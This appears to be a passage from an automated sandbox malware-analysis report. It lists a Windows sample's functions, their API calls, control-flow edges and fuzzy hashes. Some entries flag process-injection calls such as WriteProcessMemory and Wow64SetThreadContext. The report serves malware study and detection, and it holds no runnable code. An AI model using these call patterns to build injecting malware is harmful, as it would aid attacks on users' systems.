                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: dabb5059f62712224661e0704d741467a2f1a9d824400cc0ab6bb6908a09c111
                                            • Instruction ID: 26840defe74b2af7e49557b64e59f7159a40617cd1e31a8bdcd10673e5c0a650
                                            • Opcode Fuzzy Hash: dabb5059f62712224661e0704d741467a2f1a9d824400cc0ab6bb6908a09c111
                                            • Instruction Fuzzy Hash: 817156B1A00B098FD724CF6AD14579ABBF1BF48318F10892DE496D7B40DB75E846CB91
                                            Function 07590410 Relevance: 1.6, APIs: 1, Instructions: 112windowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 398 7590410-759041d 400 759041f 398->400 401 7590490-75904ad 398->401 402 7590421-7590423 400->402 403 7590426-7590430 400->403 406 75904af-75904b5 401->406 407 75904c5-75904c6 401->407 405 7593150-75931cc CreateIconFromResourceEx 402->405 413 7590451-7590461 403->413 414 7590432-759044f 403->414 408 75931ce-75931d4 405->408 409 75931d5-75931f2 405->409 411 75904b9-75904bb 406->411 412 75904b7 406->412 407->405 408->409 411->407 412->407 418 7590463-7590465 413->418 419 7590475-759047a 413->419 414->413 418->419 420 7590467-759046e 418->420 420->419 422 7590470 420->422 422->419
                                            APIs
                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0759311A,?,?,?,?,?), ref: 075931BF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1414884334.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7590000_file.jbxd
                                            Similarity
                                            • API ID: CreateFromIconResource
                                            • String ID:
                                            • API String ID: 3668623891-0
                                            • Opcode ID: 8cbf8f8d9315c927f412e058e744ae24a35337c507592a63bf0fd89f9bcdcb99
                                            • Instruction ID: a3b770ce5984c0a9ffa121a0dfcaaf93fb40990c7d7167ca70be1f59476558aa
                                            • Opcode Fuzzy Hash: 8cbf8f8d9315c927f412e058e744ae24a35337c507592a63bf0fd89f9bcdcb99
                                            • Instruction Fuzzy Hash: DC41E3F290434A9FDB11DFA9C8047EABFF9AF45220F14446BE458DB291C7748844CBA5
                                            Function 02EC449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 423 2ec449c-2ec59b9 CreateActCtxA 426 2ec59bb-2ec59c1 423->426 427 2ec59c2-2ec5a1c 423->427 426->427 434 2ec5a1e-2ec5a21 427->434 435 2ec5a2b-2ec5a2f 427->435 434->435 436 2ec5a40-2ec5a70 435->436 437 2ec5a31-2ec5a3d 435->437 441 2ec5a22-2ec5a27 436->441 442 2ec5a72-2ec5af4 436->442 437->436 441->435
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02EC59A9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408871050.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2ec0000_file.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: f50670ba9037d83b9921b23f7d589352c2a7b391e4c842053be21b184459c91a
                                            • Instruction ID: 5690cb28c39e1858fdd70fad078dc0d6a0af5337157b47d50ae13023d598cd49
                                            • Opcode Fuzzy Hash: f50670ba9037d83b9921b23f7d589352c2a7b391e4c842053be21b184459c91a
                                            • Instruction Fuzzy Hash: DB41B070C00719CBDB28DFAAC984BDEBBB5BF48304F60906AD419AB251DB756946CF90
                                            Function 02EC58ED Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 445 2ec58ed-2ec58ef 446 2ec58f9-2ec59b9 CreateActCtxA 445->446 448 2ec59bb-2ec59c1 446->448 449 2ec59c2-2ec5a1c 446->449 448->449 456 2ec5a1e-2ec5a21 449->456 457 2ec5a2b-2ec5a2f 449->457 456->457 458 2ec5a40-2ec5a70 457->458 459 2ec5a31-2ec5a3d 457->459 463 2ec5a22-2ec5a27 458->463 464 2ec5a72-2ec5af4 458->464 459->458 463->457
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 02EC59A9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408871050.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2ec0000_file.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 70aae6c6973ca0ddccabd7597d482ad349df8d92f1e3a0e49fec017c9a209e06
                                            • Instruction ID: 5bd27cef9fb2eb7e2827b4dff431655431eca5fe0346e92d2fa8b33a935fa310
                                            • Opcode Fuzzy Hash: 70aae6c6973ca0ddccabd7597d482ad349df8d92f1e3a0e49fec017c9a209e06
                                            • Instruction Fuzzy Hash: 7B41E270C00719CBDB28DFAAC9847CEBBB5BF88304F60806AD408BB251DB756946CF91
                                            Function 07593100 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 467 7593100-7593125 call 759041c 470 759313a-75931cc CreateIconFromResourceEx 467->470 471 7593127-7593137 467->471 476 75931ce-75931d4 470->476 477 75931d5-75931f2 470->477 476->477
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1414884334.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7590000_file.jbxd
                                            Similarity
                                            • API ID: CreateFromIconResource
                                            • String ID:
                                            • API String ID: 3668623891-0
                                            • Opcode ID: 5bb845ab33e61197d408b4c3ea8a1872474aef200d1019d0fe3059737c624f17
                                            • Instruction ID: 78507c341a115ddf0d788fc8c8c102e4e2ef95a843582237fdf7181cec26a915
                                            • Opcode Fuzzy Hash: 5bb845ab33e61197d408b4c3ea8a1872474aef200d1019d0fe3059737c624f17
                                            • Instruction Fuzzy Hash: 1D31AB72904389DFCB11CFA9D804ADABFF4FF49220F14806AE954A7261C3369850DFA1
                                            Function 0C2F50B0 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 480 c2f50b0-c2f50c5 482 c2f50ce-c2f50db 480->482 483 c2f50c7-c2f50cd 480->483 485 c2f50dd-c2f50e4 482->485 486 c2f5133-c2f5139 482->486 485->486 489 c2f50e6-c2f50ed 485->489 487 c2f515e-c2f517d 486->487 488 c2f513b-c2f515d 486->488 490 c2f50ff-c2f510a 489->490 491 c2f50ef-c2f50fd 489->491 494 c2f510d-c2f512e KiUserCallbackDispatcher 490->494 491->494 494->486
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 0C2F512E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: f09b44f875ae84c18ba0353f01eb8a9061e4748dfab5d9c186d6a4c8762c40bb
                                            • Instruction ID: 27a7d2a2b0dfe5f2664280dde6eaba250324400cb24c220b71bac229a4080d49
                                            • Opcode Fuzzy Hash: f09b44f875ae84c18ba0353f01eb8a9061e4748dfab5d9c186d6a4c8762c40bb
                                            • Instruction Fuzzy Hash: 3C21AC72B001199BEB14DF69DC10BAAB776FFC8724F148178E609A7691CB75AC16CB80
                                            Function 07598E48 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 496 7598e48-7598e9c 498 7598e9e-7598ea4 496->498 499 7598ea7-7598eb6 496->499 498->499 500 7598eb8 499->500 501 7598ebb-7598ef4 DrawTextExW 499->501 500->501 502 7598efd-7598f1a 501->502 503 7598ef6-7598efc 501->503 503->502
                                            APIs
                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07598EE7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1414884334.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7590000_file.jbxd
                                            Similarity
                                            • API ID: DrawText
                                            • String ID:
                                            • API String ID: 2175133113-0
                                            • Opcode ID: 072b3a309e3b08d06411f99d4fe824fc16162042f6e700958d30dbab971ea6b2
                                            • Instruction ID: 1a7dd1ed5535c81441d86b7a2a547b1295d1750acfcd652af3cab3a95716989b
                                            • Opcode Fuzzy Hash: 072b3a309e3b08d06411f99d4fe824fc16162042f6e700958d30dbab971ea6b2
                                            • Instruction Fuzzy Hash: 4431E2B5D003499FDB10CF9AD880AEEBBF5FB48220F14842EE419A7210C775A545CFA5
                                            Function 0C2F30B0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 506 c2f30b0-c2f3120 508 c2f3128-c2f3157 SetWindowTextW 506->508 509 c2f3122-c2f3125 506->509 510 c2f3159-c2f315f 508->510 511 c2f3160-c2f3181 508->511 509->508 510->511
                                            APIs
                                            • SetWindowTextW.USER32(?,00000000), ref: 0C2F314A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID: TextWindow
                                            • String ID:
                                            • API String ID: 530164218-0
                                            • Opcode ID: 319c84d44cd1922c7cee4869f4f686cacfead4b2f86243c46e1b27bb711cfb68
                                            • Instruction ID: 64cb5f46a133d8584b217e82d8125fb71dfd9aa6e7bce46d12e8a3c2d5dda904
                                            • Opcode Fuzzy Hash: 319c84d44cd1922c7cee4869f4f686cacfead4b2f86243c46e1b27bb711cfb68
                                            • Instruction Fuzzy Hash: CD2189B2C042498FDB10CFAAC844BDEFFF4EB48310F14802AE454A7650C378A546CFA1
                                            Function 07598E50 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 513 7598e50-7598e9c 514 7598e9e-7598ea4 513->514 515 7598ea7-7598eb6 513->515 514->515 516 7598eb8 515->516 517 7598ebb-7598ef4 DrawTextExW 515->517 516->517 518 7598efd-7598f1a 517->518 519 7598ef6-7598efc 517->519 519->518
                                            APIs
                                            • DrawTextExW.USER32(?,?,?,?,?,?), ref: 07598EE7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1414884334.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7590000_file.jbxd
                                            Similarity
                                            • API ID: DrawText
                                            • String ID:
                                            • API String ID: 2175133113-0
                                            • Opcode ID: 8319859318260b4d3d2457e57bcd9516526ae5b7ebbf2936d22d0993fee5b74b
                                            • Instruction ID: 670a3a140ff0e14e5be39b22afad489426047649e1e0c3d247dd830ca764256e
                                            • Opcode Fuzzy Hash: 8319859318260b4d3d2457e57bcd9516526ae5b7ebbf2936d22d0993fee5b74b
                                            • Instruction Fuzzy Hash: F821C0B5D013499FDB10CF9AD884ADEFBF5BB48320F14842EE819A7210D775A944CFA4
                                            Function 0767C558 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 522 767c558-767c5a6 524 767c5b6-767c5f5 WriteProcessMemory 522->524 525 767c5a8-767c5b4 522->525 527 767c5f7-767c5fd 524->527 528 767c5fe-767c62e 524->528 525->524 527->528
                                            APIs
                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0767C5E8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415248979.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7670000_file.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: b3773b99fea7c8ca35d4a04adc6a5f0148396e507f6e800c8ed11b60ca83bb98
                                            • Instruction ID: d23c4a87608588758993990d6185b0ba2f12bfd465e424e95d30e59d4d37e072
                                            • Opcode Fuzzy Hash: b3773b99fea7c8ca35d4a04adc6a5f0148396e507f6e800c8ed11b60ca83bb98
                                            • Instruction Fuzzy Hash: 292125B19003599FDB10CFAAC885BEEBBF5FF48310F10842AE959A7240D7799950CBA4
                                            Function 0C2FB1AF Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,0C2FC1E8,0409412C,030B0868), ref: 0C2FC279
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID: EnumThreadWindows
                                            • String ID:
                                            • API String ID: 2941952884-0
                                            • Opcode ID: f95f6993bef6918975bad84a76a6804f102a90c7cb961305c52e8f98b4e8bd82
                                            • Instruction ID: deb4f77608677ec2fb120feba4a158b89a7828559f233ab8168429b6f458df1f
                                            • Opcode Fuzzy Hash: f95f6993bef6918975bad84a76a6804f102a90c7cb961305c52e8f98b4e8bd82
                                            • Instruction Fuzzy Hash: 8A2178719142498FDB10CFAAC848BEEFBF4EF88320F14846AD454A7351D774A945CFA1
                                            Function 02ECCA40 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02ECD366,?,?,?,?,?), ref: 02ECD427
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408871050.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2ec0000_file.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: ef10a3cf85ecc7bcf1d414d8d76531a262a2546659ad96d9491e5fc287cddd84
                                            • Instruction ID: 1487f762582073d3b7ea0ca0fcff0f14e9e9280351209568b3bec13043229fc8
                                            • Opcode Fuzzy Hash: ef10a3cf85ecc7bcf1d414d8d76531a262a2546659ad96d9491e5fc287cddd84
                                            • Instruction Fuzzy Hash: 912105B59002489FDB10CF9AD984ADEBBF4FB48310F10802AE914A7350C375A951CFA4
                                            Function 0B9B0C00 Relevance: 1.6, APIs: 1, Instructions: 63windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,?,?,?), ref: 0B9B0C85
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416749754.000000000B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B9B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9b0000_file.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 5d2775b824e210637e184775cb80932cfbf6dbc21e188b7723bf0ec07f84d5d2
                                            • Instruction ID: b8817f0c5e30236c43262e641d6f12e4e79e7c45a7d38ef792ac6cc7a14241a3
                                            • Opcode Fuzzy Hash: 5d2775b824e210637e184775cb80932cfbf6dbc21e188b7723bf0ec07f84d5d2
                                            • Instruction Fuzzy Hash: AC216D71808389DFDB12CFA9C845BDABFF4EF0A210F15849AD494A7252C3385944CF72
                                            Function 0767C648 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0767C6C8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415248979.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7670000_file.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: bc9446a6d327c9d15ca3e2cf8575e97914e50fa8a63eda4711e60d1d7763436c
                                            • Instruction ID: db6a4935cdeb56f78750f0816f46287eef555f10b656b2f7b3f8fe9ce80c4e16
                                            • Opcode Fuzzy Hash: bc9446a6d327c9d15ca3e2cf8575e97914e50fa8a63eda4711e60d1d7763436c
                                            • Instruction Fuzzy Hash: DB2128B18003599FDF10DFAAC884BEEBBF5FF48310F10842AE559A7240D7799541CBA4
                                            Function 0767C3C0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0767C43E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1415248979.0000000007670000.00000040.00000800.00020000.00000000.sdmp, Offset: 07670000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7670000_file.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 1b4d100207a20b6e8778f20044c81488f0074f8b03791b26a0b0c036f3bcf25b
                                            • Instruction ID: 141bf054dc8316bc1715653adcda0eebaff79df9397da58a9ee6af5db02ebe4e
                                            • Opcode Fuzzy Hash: 1b4d100207a20b6e8778f20044c81488f0074f8b03791b26a0b0c036f3bcf25b
                                            • Instruction Fuzzy Hash: C22177B1D003098FDB10CFAAC8857EEBBF5EF48324F10842AD459A7240C7789A85CFA4
                                            Function 0C2FB1BC Relevance: 1.6, APIs: 1, Instructions: 62threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,0C2FC1E8,0409412C,030B0868), ref: 0C2FC279
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID: EnumThreadWindows
                                            • String ID:
                                            • API String ID: 2941952884-0
                                            • Opcode ID: d68b90d4db322feb18bd4c26d75db1618b762b218e6b1fed06f80fb18e65efd3
                                            • Instruction ID: 03fda70eac601f8a54cae028b18864c0f3899736ba9fadfa8156f6b19471f039
                                            • Opcode Fuzzy Hash: d68b90d4db322feb18bd4c26d75db1618b762b218e6b1fed06f80fb18e65efd3
                                            • Instruction Fuzzy Hash: A72137719102099FDB20CFAAC844BEEFBF4EB88720F10842AE554A3250D774A945CFA4
                                            Function 02ECD398 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02ECD366,?,?,?,?,?), ref: 02ECD427
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408871050.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2ec0000_file.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 0d8a4b8b759f890d6e3d64b402e87ffbf310fbede71f5b5b66580290bf82710f
                                            • Instruction ID: be4bd6054e14e85dc9d3c3643be47028756e48aba15c4fba7935ae98f15d5bdd
                                            • Opcode Fuzzy Hash: 0d8a4b8b759f890d6e3d64b402e87ffbf310fbede71f5b5b66580290bf82710f
                                            • Instruction Fuzzy Hash: 112100B69002089FDB10CFAAD985BDEBBF4FB08314F14802AE918A3350C379A941CF64
                                            Function 0C2F31C0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetClassInfoW.USER32(?,00000000), ref: 0C2F323C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID: ClassInfo
                                            • String ID:
                                            • API String ID: 3534257612-0
                                            • Opcode ID: 3508aa435d7a363dc5333bd9b3bba31b0176c3e5b0ff606e3ed776538f0d0795
                                            • Instruction ID: 39dedfd990c3b9b5cc5d76bb2d08bb1698d9083e6bfbd0f29bafbe23c22c2184
                                            • Opcode Fuzzy Hash: 3508aa435d7a363dc5333bd9b3bba31b0176c3e5b0ff606e3ed776538f0d0795
                                            • Instruction Fuzzy Hash: 4B2104B29017099FDB10CF9AC884BDEFBF4BB48210F14802AE958A3750D374A945CB65
                                            Function 0C2FC201 Relevance: 1.6, APIs: 1, Instructions: 60threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • EnumThreadWindows.USER32(?,00000000,?,?,?,?,00000E20,?,?,0C2FC1E8,0409412C,030B0868), ref: 0C2FC279
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1418454640.000000000C2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C2F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_c2f0000_file.jbxd
                                            Similarity
                                            • API ID: EnumThreadWindows
                                            • String ID:
                                            • API String ID: 2941952884-0
                                            • Opcode ID: 7783b46353e3ea120faa66747532159896d5d1a8ed130490a00ec686ef4270a5
                                            • Instruction ID: 1f80782ba71d27d2be90e4e807d6722e5b0559ccc86af654e05a73a2ca00fd27
                                            • Opcode Fuzzy Hash: 7783b46353e3ea120faa66747532159896d5d1a8ed130490a00ec686ef4270a5
                                            • Instruction Fuzzy Hash: A82127B19102499FDB14CFAAC844BEEFBF5FF88320F14842AE468A7250D774A945CF65
                                            Function 02ECB159 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNEL32(00000000), ref: 02ECB126
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1408871050.0000000002EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EC0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2ec0000_file.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 469a6321f41af941b6a206f49b3b02ee6aea941929a6fc5c6f5c401700551eea
                                            • Instruction ID: ce3c488e0488cb77f02164b96f7cedec87f6be9c8d3a1eb0cb26a372b3ca8dd6
                                            • Opcode Fuzzy Hash: 469a6321f41af941b6a206f49b3b02ee6aea941929a6fc5c6f5c401700551eea
                                            • Instruction Fuzzy Hash: 4511C472A402048FEB14DF9AE9017ABBBE5EFC4318F24C46ED404A7351C774A806CBB1
                                            Function 0BA63A78 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0BA63A95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416947425.000000000BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ba60000_file.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 78cff7e7544f087e591eb33f98c6631d4098aa119b96f49f85c4bec6f87816de
                                            • Instruction ID: 50d9e29621595715d19c1e5b46070c5294ab4fa22550402260e544e67414fc42
                                            • Opcode Fuzzy Hash: 78cff7e7544f087e591eb33f98c6631d4098aa119b96f49f85c4bec6f87816de
                                            • Instruction Fuzzy Hash: 16112D343105108FCE18AB3DC95896E77EAAFD5A5431540AEE902CB3B2EE72DC03DB54
                                            Function 0BA63A69 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0BA63A95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416947425.000000000BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BA60000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_ba60000_file.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 50bcc5dfe8c35cc8d7112cbcc05b3563fc0ab192f0b16f8dea488cd4ca2e4a0b
                                            • Instruction ID: 0fbf6e78f8a9cba9d2ea0da589ce3a62962abc73fb9344edac9661fd422069bd
                                            • Opcode Fuzzy Hash: 50bcc5dfe8c35cc8d7112cbcc05b3563fc0ab192f0b16f8dea488cd4ca2e4a0b
                                            • Instruction Fuzzy Hash: 55118B753102508FCF09AB3DC95496A7BEAAFD5A5031540AEE502CB372EE62CC03C750
                                            Function 0759041C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0759311A,?,?,?,?,?), ref: 075931BF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1414884334.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7590000_file.jbxd
                                            Similarity
                                            • API ID: CreateFromIconResource
                                            • String ID:
                                            • API String ID: 3668623891-0
                                            • Opcode ID: 4b6c86514a2f43e5ac2dcb28135024761d15dd20b13309bc3b3e861c5059d7a9
                                            • Instruction ID: dbb26446523d65ed272dc751ffb2a0ae16e30d5cd04d89da9b8959efedea3022
                                            • Opcode Fuzzy Hash: 4b6c86514a2f43e5ac2dcb28135024761d15dd20b13309bc3b3e861c5059d7a9
                                            • Instruction Fuzzy Hash: E61117B1900249DFDB10CF9AC844BDEBFF8EB48320F14846AE955A7260C375A950DFA5
                                            Function 0B9B4790 Relevance: 1.6, APIs: 1, Instructions: 55windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0B9B5A22,00000000,00000000,0409412C,030B0868), ref: 0B9B5E70
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416749754.000000000B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B9B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9b0000_file.jbxd
                                            Similarity
                                            • API ID: MessagePeek
                                            • String ID:
                                            • API String ID: 2222842502-0
                                            • Opcode ID: f28c71c6c63ea1484f1e1a101ccd821a57b39fe504b0e04a91784c76fdb768c5
                                            • Instruction ID: eecb810cee669726fbd96a006d33f417cc40b43ed83868184be97953f934ef6d
                                            • Opcode Fuzzy Hash: f28c71c6c63ea1484f1e1a101ccd821a57b39fe504b0e04a91784c76fdb768c5
                                            • Instruction Fuzzy Hash: DE11E7B5804249DFDB10CF9AD944BEEBBF8FB58310F10842AE554A7251C374A544CFA5
                                            Function 0B9B47A8 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                            Download Yara Rule
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,00000000,00000000,?,?,?,0B9B5AAF,00000000,0409412C,030B0868,00000000,?), ref: 0B9B620D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1416749754.000000000B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B9B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b9b0000_file.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 7a9b78ae14ea6592435d723aa448f4823d9d76e2dc754ba5e915054920f183bb
                                            • Instruction ID: af6bc1f5580e91e34563bf15dcacfe972a1d168933c96b0758e867776b5e5060
                                            • Opcode Fuzzy Hash: 7a9b78ae14ea6592435d723aa448f4823d9d76e2dc754ba5e915054920f183bb
                                            • Instruction Fuzzy Hash: 4C11F6B5C043499FDB10DF9AD944BEEFBF8EB48710F10842AE968A3241C378A544CFA5
                                            Function 0B9B5E00 Relevance: 1.6, APIs: 1, Instructions: 54windowCOMMON
                                            Download Yara Rule
                                            APIs
